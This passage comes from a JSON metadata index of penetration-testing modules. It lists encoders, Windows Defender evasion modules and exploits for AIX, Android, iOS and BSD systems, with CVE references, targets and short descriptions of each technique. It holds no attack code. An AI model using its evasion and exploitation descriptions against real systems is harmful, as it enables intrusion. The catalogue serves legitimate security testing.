"description": "Encodes a payload using a series of SUB instructions and writing the\n encoded value to ESP. This concept is based on the known SUB encoding\n approach that is widely used to manually encode payloads with very\n restricted allowed character sets. It will not reset EAX to zero unless\n absolutely necessary, which helps reduce the payload by 10 bytes for\n every 4-byte chunk. ADD support hasn't been included as the SUB\n instruction is more likely to avoid bad characters anyway.\n\n The payload requires a base register to work off which gives the start\n location of the encoder payload in memory. If not specified, it defaults\n to ESP. If the given register doesn't point exactly to the start of the\n payload then an offset value is also required.\n\n Note: Due to the fact that many payloads use the FSTENV approach to\n get the current location in memory there is an option to protect the\n start of the payload by setting the 'OverwriteProtect' flag to true.\n This adds 3-bytes to the start of the payload to bump ESP by 32 bytes\n so that it's clear of the top of the payload.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/opt_sub.rb",
"is_install_path": true,
"ref_name": "x86/opt_sub",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/service": {
"name": "Register Service",
"full_name": "encoder/x86/service",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"agix"
],
"description": "Register service if used with psexec for example",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/service.rb",
"is_install_path": true,
"ref_name": "x86/service",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/shikata_ga_nai": {
"name": "Polymorphic XOR Additive Feedback Encoder",
"full_name": "encoder/x86/shikata_ga_nai",
"rank": 600,
"disclosure_date": null,
"type": "encoder",
"author": [
"spoonm <spoonm@no$email.com>"
],
"description": "This encoder implements a polymorphic XOR additive feedback encoder.\n The decoder stub is generated based on dynamic instruction\n substitution and dynamic block ordering. Registers are also\n selected dynamically.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/shikata_ga_nai.rb",
"is_install_path": true,
"ref_name": "x86/shikata_ga_nai",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/single_static_bit": {
"name": "Single Static Bit",
"full_name": "encoder/x86/single_static_bit",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "Static value for specific bit",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/single_static_bit.rb",
"is_install_path": true,
"ref_name": "x86/single_static_bit",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/unicode_mixed": {
"name": "Alpha2 Alphanumeric Unicode Mixedcase Encoder",
"full_name": "encoder/x86/unicode_mixed",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"pusscat <pusscat@metasploit.com>",
"skylined <skylined@edup.tudelft.nl>"
],
"description": "Encodes payloads as unicode-safe mixedcase text. This encoder uses\n SkyLined's Alpha2 encoding suite.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/unicode_mixed.rb",
"is_install_path": true,
"ref_name": "x86/unicode_mixed",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/unicode_upper": {
"name": "Alpha2 Alphanumeric Unicode Uppercase Encoder",
"full_name": "encoder/x86/unicode_upper",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"pusscat <pusscat@metasploit.com>",
"skylined <skylined@edup.tudelft.nl>"
],
"description": "Encodes payload as unicode-safe uppercase text. This encoder uses\n SkyLined's Alpha2 encoding suite.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/unicode_upper.rb",
"is_install_path": true,
"ref_name": "x86/unicode_upper",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/xor_dynamic": {
"name": "Dynamic key XOR Encoder",
"full_name": "encoder/x86/xor_dynamic",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"lupman",
"phra"
],
"description": "An x86 XOR encoder with dynamic key size",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-10 22:45:45 +0000",
"path": "/modules/encoders/x86/xor_dynamic.rb",
"is_install_path": true,
"ref_name": "x86/xor_dynamic",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"evasion_windows/windows_defender_exe": {
"name": "Microsoft Windows Defender Evasive Executable",
"full_name": "evasion/windows/windows_defender_exe",
"rank": 300,
"disclosure_date": null,
"type": "evasion",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module allows you to generate a Windows EXE that evades Microsoft\n Windows Defender. Multiple techniques such as shellcode encryption, source code\n obfuscation, Metasm, and anti-emulation are used to achieve this.\n\n For best results, please try to use payloads that use a more secure channel\n such as HTTPS or RC4 in order to better avoid the payload's network traffic\n getting caught by antivirus.",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": [
"Microsoft Windows"
],
"mod_time": "2018-10-06 16:04:07 +0000",
"path": "/modules/evasion/windows/windows_defender_exe.rb",
"is_install_path": true,
"ref_name": "windows/windows_defender_exe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"evasion_windows/windows_defender_js_hta": {
"name": "Microsoft Windows Defender Evasive JS.Net and HTA",
"full_name": "evasion/windows/windows_defender_js_hta",
"rank": 300,
"disclosure_date": null,
"type": "evasion",
"author": [
"sinmygit",
"Shelby Pace"
],
"description": "This module will generate an HTA file that writes and compiles a JScript.NET file\n containing shellcode on the target machine. After compilation, the generated EXE will\n execute the shellcode without interference from Windows Defender.\n\n It is recommended that you use a payload that uses RC4 or HTTPS for best experience.",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": [
"Microsoft Windows"
],
"mod_time": "2018-10-11 17:38:47 +0000",
"path": "/modules/evasion/windows/windows_defender_js_hta.rb",
"is_install_path": true,
"ref_name": "windows/windows_defender_js_hta",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_aix/local/ibstat_path": {
"name": "ibstat $PATH Privilege Escalation",
"full_name": "exploit/aix/local/ibstat_path",
"rank": 600,
"disclosure_date": "2013-09-24",
"type": "exploit",
"author": [
"Kristian Erik Hermansen",
"Sagi Shahar <sagi.shahar@mwrinfosecurity.com>",
"Kostas Lintovois <kostas.lintovois@mwrinfosecurity.com>"
],
"description": "This module exploits the trusted $PATH environment variable of the SUID binary \"ibstat\".",
"references": [
"CVE-2013-4011",
"OSVDB-95420",
"BID-61287",
"URL-http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827",
"URL-http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756"
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IBM AIX Version 6.1",
"IBM AIX Version 7.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/aix/local/ibstat_path.rb",
"is_install_path": true,
"ref_name": "aix/local/ibstat_path",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_aix/rpc_cmsd_opcode21": {
"name": "AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow",
"full_name": "exploit/aix/rpc_cmsd_opcode21",
"rank": 500,
"disclosure_date": "2009-10-07",
"type": "exploit",
"author": [
"Rodrigo Rubira Branco (BSDaemon)",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a buffer overflow vulnerability in opcode 21 handled by\n rpc.cmsd on AIX. By making a request with a long string passed to the first\n argument of the \"rtable_create\" RPC, a stack based buffer overflow occurs. This\n leads to arbitrary code execution.\n\n NOTE: Unsuccessful attempts may cause inetd/portmapper to enter a state where\n further attempts are not possible.",
"references": [
"CVE-2009-3699",
"OSVDB-58726",
"BID-36615",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=825",
"URL-http://aix.software.ibm.com/aix/efixes/security/cmsd_advisory.asc"
],
"platform": "AIX",
"arch": "",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IBM AIX Version 5.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/aix/rpc_cmsd_opcode21.rb",
"is_install_path": true,
"ref_name": "aix/rpc_cmsd_opcode21",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_aix/rpc_ttdbserverd_realpath": {
"name": "ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)",
"full_name": "exploit/aix/rpc_ttdbserverd_realpath",
"rank": 500,
"disclosure_date": "2009-06-17",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
"description": "This module exploits a buffer overflow vulnerability in the _tt_internal_realpath\n function of the ToolTalk database server (rpc.ttdbserverd).",
"references": [
"CVE-2009-2727",
"OSVDB-55151"
],
"platform": "AIX",
"arch": "",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IBM AIX Version 6.1.4",
"IBM AIX Version 6.1.3",
"IBM AIX Version 6.1.2",
"IBM AIX Version 6.1.1",
"IBM AIX Version 6.1.0",
"IBM AIX Version 5.3.10 5.3.9 5.3.8 5.3.7",
"IBM AIX Version 5.3.10",
"IBM AIX Version 5.3.9",
"IBM AIX Version 5.3.8",
"IBM AIX Version 5.3.7",
"Debug IBM AIX Version 6.1",
"Debug IBM AIX Version 5.3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/aix/rpc_ttdbserverd_realpath.rb",
"is_install_path": true,
"ref_name": "aix/rpc_ttdbserverd_realpath",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_android/adb/adb_server_exec": {
"name": "Android ADB Debug Server Remote Payload Execution",
"full_name": "exploit/android/adb/adb_server_exec",
"rank": 600,
"disclosure_date": "2016-01-01",
"type": "exploit",
"author": [
"joev <joev@metasploit.com>"
],
"description": "Writes and spawns a native payload on an android device that is listening\n for adb debug messages.",
"references": [
],
"platform": "Linux",
"arch": "armle, x86, x64, mipsle",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"armle",
"x86",
"x64",
"mipsle"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/android/adb/adb_server_exec.rb",
"is_install_path": true,
"ref_name": "android/adb/adb_server_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_android/browser/samsung_knox_smdm_url": {
"name": "Samsung Galaxy KNOX Android Browser RCE",
"full_name": "exploit/android/browser/samsung_knox_smdm_url",
"rank": 600,
"disclosure_date": "2014-11-12",
"type": "exploit",
"author": [
"Andre Moulu",
"jduck <jduck@metasploit.com>",
"joev <joev@metasploit.com>"
],
"description": "A vulnerability exists in the KNOX security component of the Samsung Galaxy\n firmware that allows a remote webpage to install an APK with arbitrary\n permissions by abusing the 'smdm://' protocol handler registered by the KNOX\n component.\n\n The vulnerability has been confirmed in the Samsung Galaxy S4, S5, Note 3,\n and Ace 4.",
"references": [
"URL-http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html",
"OSVDB-114590"
],
"platform": "Android",
"arch": "dalvik",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/android/browser/samsung_knox_smdm_url.rb",
"is_install_path": true,
"ref_name": "android/browser/samsung_knox_smdm_url",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_android/browser/stagefright_mp4_tx3g_64bit": {
"name": "Android Stagefright MP4 tx3g Integer Overflow",
"full_name": "exploit/android/browser/stagefright_mp4_tx3g_64bit",
"rank": 300,
"disclosure_date": "2015-08-13",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>",
"NorthBit"
],
"description": "This module exploits an integer overflow vulnerability in the Stagefright\n Library (libstagefright.so). The vulnerability occurs when parsing specially\n crafted MP4 files. While a wide variety of remote attack vectors exist, this\n particular exploit is designed to work within an HTML5 compliant browser.\n\n Exploitation is done by supplying a specially crafted MP4 file with two\n tx3g atoms that, when their sizes are summed, cause an integer overflow when\n processing the second atom. As a result, a temporary buffer is allocated\n with insufficient size and a memcpy call leads to a heap overflow.\n\n This version of the exploit uses a two-stage information leak based on\n corrupting the MetaData that the browser reads from mediaserver. This method\n is based on a technique published in NorthBit's Metaphor paper. First,\n we use a variant of their technique to read the address of a heap buffer\n located adjacent to a SampleIterator object as the video HTML element's\n videoHeight. Next, we read the vtable pointer from an empty Vector within\n the SampleIterator object using the video element's duration. This gives\n us a code address that we can use to determine the base address of\n libstagefright and construct a ROP chain dynamically.\n\n NOTE: the mediaserver process on many Android devices (Nexus, for example) is\n constrained by SELinux and thus cannot use the execve system call. To avoid\n this problem, the original exploit uses a kernel exploit payload that disables\n SELinux and spawns a shell as root. Work is underway to make the framework\n more amenable to these types of situations. Until that work is complete, this\n exploit will only yield a shell on devices without SELinux or with SELinux in\n permissive mode.",
"references": [
"CVE-2015-3864",
"URL-https://blog.exodusintel.com/2015/08/13/stagefright-mission-accomplished/",
"URL-http://googleprojectzero.blogspot.com/2015/09/stagefrightened.html",
"URL-https://raw.githubusercontent.com/NorthBit/Public/master/NorthBit-Metaphor.pdf",
"URL-https://github.com/NorthBit/Metaphor",
"URL-http://drops.wooyun.org/papers/7558",
"URL-http://translate.wooyun.io/2015/08/08/Stagefright-Vulnerability-Disclosure.html",
"URL-https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/2016/01/libstagefright-exploit-notespdf/"
],
"platform": "Linux",
"arch": "armle",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Nexus 7 (Wi-Fi) (razor) with Android 5.0 (LRX21P)",
"Nexus 7 (Wi-Fi) (razor) with Android 5.0.1 (LRX22C)",
"Nexus 7 (Wi-Fi) (razor) with Android 5.0.2 (LRX22G)",
"Nexus 7 (Wi-Fi) (razor) with Android 5.1 (LMY47O)",
"Nexus 7 (Wi-Fi) (razor) with Android 5.1.1 (LMY47V)",
"Nexus 7 (Wi-Fi) (razor) with Android 5.1.1 (LMY48G)",
"Nexus 7 (Wi-Fi) (razor) with Android 5.1.1 (LMY48I)",
"Nexus 7 (Mobile) (razorg) with Android 5.0.2 (LRX22G)",
"Nexus 7 (Mobile) (razorg) with Android 5.1 (LMY47O)",
"Nexus 7 (Mobile) (razorg) with Android 5.1.1 (LMY47V)",
"Nexus 5 (hammerhead) with Android 5.0 (LRX21O)",
"Nexus 5 (hammerhead) with Android 5.0.1 (LRX22C)",
"Nexus 5 (hammerhead) with Android 5.1 (LMY47D)",
"Nexus 5 (hammerhead) with Android 5.1 (LMY47I)",
"Nexus 5 (hammerhead) with Android 5.1.1 (LMY48B)",
"Nexus 5 (hammerhead) with Android 5.1.1 (LMY48I)",
"Nexus 6 (shamu) with Android 5.0 (LRX21O)",
"Nexus 6 (shamu) with Android 5.0.1 (LRX22C)",
"Nexus 6 (shamu) with Android 5.1 (LMY47D)",
"Nexus 6 (shamu) with Android 5.1 (LMY47E)",
"Nexus 6 (shamu) with Android 5.1 (LMY47I)",
"Nexus 6 (shamu) with Android 5.1.1 (LYZ28E)",
"Nexus 6 (shamu) with Android 5.1 (LMY47M)",
"Nexus 6 (shamu) with Android 5.1.1 (LMY47Z)",
"Nexus 6 (shamu) with Android 5.1.1 (LVY48C)",
"Nexus 6 (shamu) with Android 5.1.1 (LMY48I)",
"Nexus 6 (shamu) with Android 5.1.1 (LYZ28J)",
"Nexus 6 (shamu) with Android 5.1.1 (LVY48E)",
"Samsung Galaxy S5 (VZW SM-G900V) with Android 5.0 (LRX21T)"
],
"mod_time": "2018-08-27 13:11:22 +0000",
"path": "/modules/exploits/android/browser/stagefright_mp4_tx3g_64bit.rb",
"is_install_path": true,
"ref_name": "android/browser/stagefright_mp4_tx3g_64bit",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"stagefright"
]
}
},
"exploit_android/browser/webview_addjavascriptinterface": {
"name": "Android Browser and WebView addJavascriptInterface Code Execution",
"full_name": "exploit/android/browser/webview_addjavascriptinterface",
"rank": 600,
"disclosure_date": "2012-12-21",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>",
"joev <joev@metasploit.com>"
],
"description": "This module exploits a privilege escalation issue in Android < 4.2's WebView component\n that arises when untrusted Javascript code is executed by a WebView that has one or more\n Interfaces added to it. The untrusted Javascript code can call into the Java Reflection\n APIs exposed by the Interface and execute arbitrary commands.\n\n Some distributions of the Android Browser app have an addJavascriptInterface\n call tacked on, and thus are vulnerable to RCE. The Browser app in the Google APIs\n 4.1.2 release of Android is known to be vulnerable.\n\n A secondary attack vector involves the WebViews embedded inside a large number\n of Android applications. Ad integrations are perhaps the worst offender here.\n If you can MITM the WebView's HTTP connection, or if you can get a persistent XSS\n into the page displayed in the WebView, then you can inject the html/js served\n by this module and get a shell.\n\n Note: Adding a .js to the URL will return plain javascript (no HTML markup).",
"references": [
"URL-http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/",
"URL-https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/",
"URL-http://50.56.33.56/blog/?p=314",
"URL-https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/",
"URL-https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py",
"CVE-2012-6636",
"CVE-2013-4710",
"EDB-31519",
"OSVDB-97520"
],
"platform": "Android,Linux",
"arch": "dalvik, x86, armle, mipsle",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/android/browser/webview_addjavascriptinterface.rb",
"is_install_path": true,
"ref_name": "android/browser/webview_addjavascriptinterface",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_android/fileformat/adobe_reader_pdf_js_interface": {
"name": "Adobe Reader for Android addJavascriptInterface Exploit",
"full_name": "exploit/android/fileformat/adobe_reader_pdf_js_interface",
"rank": 400,
"disclosure_date": "2014-04-13",
"type": "exploit",
"author": [
"Yorick Koster",
"joev <joev@metasploit.com>"
],
"description": "Adobe Reader versions less than 11.2.0 expose insecure native\n interfaces to untrusted javascript in a PDF. This module embeds the browser\n exploit from android/webview_addjavascriptinterface into a PDF to get a\n command shell on vulnerable versions of Reader.",
"references": [
"CVE-2014-0514",
"EDB-32884",
"OSVDB-105781"
],
"platform": "Android",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Android ARM",
"Android MIPSLE",
"Android X86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb",
"is_install_path": true,
"ref_name": "android/fileformat/adobe_reader_pdf_js_interface",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_android/local/futex_requeue": {
"name": "Android 'Towelroot' Futex Requeue Kernel Exploit",
"full_name": "exploit/android/local/futex_requeue",
"rank": 600,
"disclosure_date": "2014-05-03",
"type": "exploit",
"author": [
"Pinkie Pie",
"geohot",
"timwr"
],
"description": "This module exploits a bug in futex_requeue in the Linux kernel, using\n similar techniques employed by the towelroot exploit. Any Android device\n with a kernel built before June 2014 is likely to be vulnerable.",
"references": [
"CVE-2014-3153",
"URL-http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/",
"URL-http://blog.nativeflow.com/the-futex-vulnerability"
],
"platform": "Android,Linux",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Targeting",
"Default",
"New Samsung",
"Old Samsung",
"Samsung Grand"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/android/local/futex_requeue.rb",
"is_install_path": true,
"ref_name": "android/local/futex_requeue",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_android/local/put_user_vroot": {
"name": "Android get_user/put_user Exploit",
"full_name": "exploit/android/local/put_user_vroot",
"rank": 600,
"disclosure_date": "2013-09-06",
"type": "exploit",
"author": [
"fi01",
"cubeundcube",
"timwr"
],
"description": "This module exploits a missing check in the get_user and put_user API functions\n in the linux kernel before 3.5.5. The missing checks on these functions\n allow an unprivileged user to read and write kernel memory.\n This exploit first reads the kernel memory to identify the commit_creds and\n ptmx_fops address, then uses the write primitive to execute shellcode as uid 0.\n The exploit was first discovered in the wild in the vroot rooting application.",
"references": [
"CVE-2013-6282",
"URL-http://forum.xda-developers.com/showthread.php?t=2434453",
"URL-https://github.com/fi01/libget_user_exploit",
"URL-http://forum.xda-developers.com/showthread.php?t=2565758"
],
"platform": "Android,Linux",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/android/local/put_user_vroot.rb",
"is_install_path": true,
"ref_name": "android/local/put_user_vroot",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_android/local/su_exec": {
"name": "Android 'su' Privilege Escalation",
"full_name": "exploit/android/local/su_exec",
"rank": 0,
"disclosure_date": "2017-08-31",
"type": "exploit",
"author": [
"timwr"
],
"description": "This module uses the su binary present on rooted devices to run\n a payload as root.\n\n A rooted Android device will contain a su binary (often linked with\n an application) that allows the user to run commands as root.\n This module will use the su binary to execute a command stager\n as root. The command stager will write a payload binary to a\n temporary directory, make it executable, execute it in the background,\n and finally delete the executable.\n\n On most devices the su binary will pop-up a prompt on the device\n asking the user for permission.",
"references": [
],
"platform": "Android,Linux",
"arch": "aarch64, armle, x86, x64, mipsle",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"aarch64",
"armle",
"x86",
"x64",
"mipsle"
],
"mod_time": "2019-03-29 10:44:58 +0000",
"path": "/modules/exploits/android/local/su_exec.rb",
"is_install_path": true,
"ref_name": "android/local/su_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_apple_ios/browser/safari_libtiff": {
"name": "Apple iOS MobileSafari LibTIFF Buffer Overflow",
"full_name": "exploit/apple_ios/browser/safari_libtiff",
"rank": 400,
"disclosure_date": "2006-08-01",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"kf <kf_list@digitalmunition.com>"
],
"description": "This module exploits a buffer overflow in the version of\n libtiff shipped with firmware versions 1.00, 1.01, 1.02, and\n 1.1.1 of the Apple iPhone. iPhones which have not had the BSD\n tools installed will need to use a special payload.",
"references": [
"CVE-2006-3459",
"OSVDB-27723",
"BID-19283"
],
"platform": "OSX",
"arch": "armle",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/apple_ios/browser/safari_libtiff.rb",
"is_install_path": true,
"ref_name": "apple_ios/browser/safari_libtiff",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_apple_ios/browser/webkit_trident": {
"name": "WebKit not_number defineProperties UAF",
"full_name": "exploit/apple_ios/browser/webkit_trident",
"rank": 0,
"disclosure_date": "2016-08-25",
"type": "exploit",
"author": [
"qwertyoruiop",
"siguza",
"tihmstar",
"benjamin-42",
"timwr"
],
"description": "This module exploits a UAF vulnerability in WebKit's JavaScriptCore library.",
"references": [
"CVE-2016-4655",
"CVE-2016-4656",
"CVE-2016-4657",
"BID-92651",
"BID-92652",
"BID-92653",
"URL-https://blog.lookout.com/trident-pegasus",
"URL-https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/",
"URL-https://www.blackhat.com/docs/eu-16/materials/eu-16-Bazaliy-Mobile-Espionage-in-the-Wild-Pegasus-and-Nation-State-Level-Attacks.pdf",
"URL-https://github.com/Siguza/PhoenixNonce",
"URL-https://jndok.github.io/2016/10/04/pegasus-writeup/",
"URL-https://sektioneins.de/en/blog/16-09-02-pegasus-ios-kernel-vulnerability-explained.html",
"URL-https://github.com/benjamin-42/Trident",
"URL-http://blog.tihmstar.net/2018/01/modern-post-exploitation-techniques.html"
],
"platform": "Apple_iOS",
"arch": "aarch64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2018-10-16 14:59:27 +0000",
"path": "/modules/exploits/apple_ios/browser/webkit_trident.rb",
"is_install_path": true,
"ref_name": "apple_ios/browser/webkit_trident",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_apple_ios/email/mobilemail_libtiff": {
"name": "Apple iOS MobileMail LibTIFF Buffer Overflow",
"full_name": "exploit/apple_ios/email/mobilemail_libtiff",
"rank": 400,
"disclosure_date": "2006-08-01",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"kf <kf_list@digitalmunition.com>"
],
"description": "This module exploits a buffer overflow in the version of\n libtiff shipped with firmware versions 1.00, 1.01, 1.02, and\n 1.1.1 of the Apple iPhone. iPhones which have not had the BSD\n tools installed will need to use a special payload.",
"references": [
"CVE-2006-3459",
"OSVDB-27723",
"BID-19283"
],
"platform": "OSX",
"arch": "armle",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": [
"MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/apple_ios/email/mobilemail_libtiff.rb",
"is_install_path": true,
"ref_name": "apple_ios/email/mobilemail_libtiff",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_apple_ios/ssh/cydia_default_ssh": {
"name": "Apple iOS Default SSH Password Vulnerability",
"full_name": "exploit/apple_ios/ssh/cydia_default_ssh",
"rank": 600,
"disclosure_date": "2007-07-02",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits the default credentials of Apple iOS when it\n has been jailbroken and the passwords for the 'root' and 'mobile'\n users have not been changed.",
"references": [
"OSVDB-61284"
],
"platform": "Unix",
"arch": "cmd",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Apple iOS"
],
"mod_time": "2018-12-12 15:41:35 +0000",
"path": "/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb",
"is_install_path": true,
"ref_name": "apple_ios/ssh/cydia_default_ssh",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_bsd/finger/morris_fingerd_bof": {
"name": "Morris Worm fingerd Stack Buffer Overflow",
"full_name": "exploit/bsd/finger/morris_fingerd_bof",
"rank": 300,
"disclosure_date": "1988-11-02",
"type": "exploit",
"author": [
"Robert Tappan Morris",
"Cliff Stoll",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in fingerd on 4.3BSD.\n This vulnerability was exploited by the Morris worm on 1988-11-02.\n Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.",
"references": [
"URL-https://en.wikipedia.org/wiki/Morris_worm",
"URL-https://spaf.cerias.purdue.edu/tech-reps/823.pdf",
"URL-http://computerarcheology.com/Virus/MorrisWorm/",
"URL-https://github.com/arialdomartini/morris-worm",
"URL-http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH"
],
"platform": "BSD",
"arch": "vax",
"rport": 79,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"@(#)fingerd.c 5.1 (Berkeley) 6/6/85"
],
"mod_time": "2018-11-22 23:10:57 +0000",
"path": "/modules/exploits/bsd/finger/morris_fingerd_bof.rb",
"is_install_path": true,
"ref_name": "bsd/finger/morris_fingerd_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_bsdi/softcart/mercantec_softcart": {
"name": "Mercantec SoftCart CGI Overflow",
"full_name": "exploit/bsdi/softcart/mercantec_softcart",
"rank": 500,
"disclosure_date": "2004-08-19",
"type": "exploit",
"author": [
"skape <mmiller@hick.org>",
"trew"
],
"description": "This is an exploit for an undisclosed buffer overflow\n in the SoftCart.exe CGI as shipped with Mercantec's shopping\n cart software. It is possible to execute arbitrary code\n by passing a malformed CGI parameter in an HTTP GET\n request. This issue is known to affect SoftCart version\n 4.00b.",
"references": [
"CVE-2004-2221",
"OSVDB-9011",
"BID-10926"
],
"platform": "BSDi",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
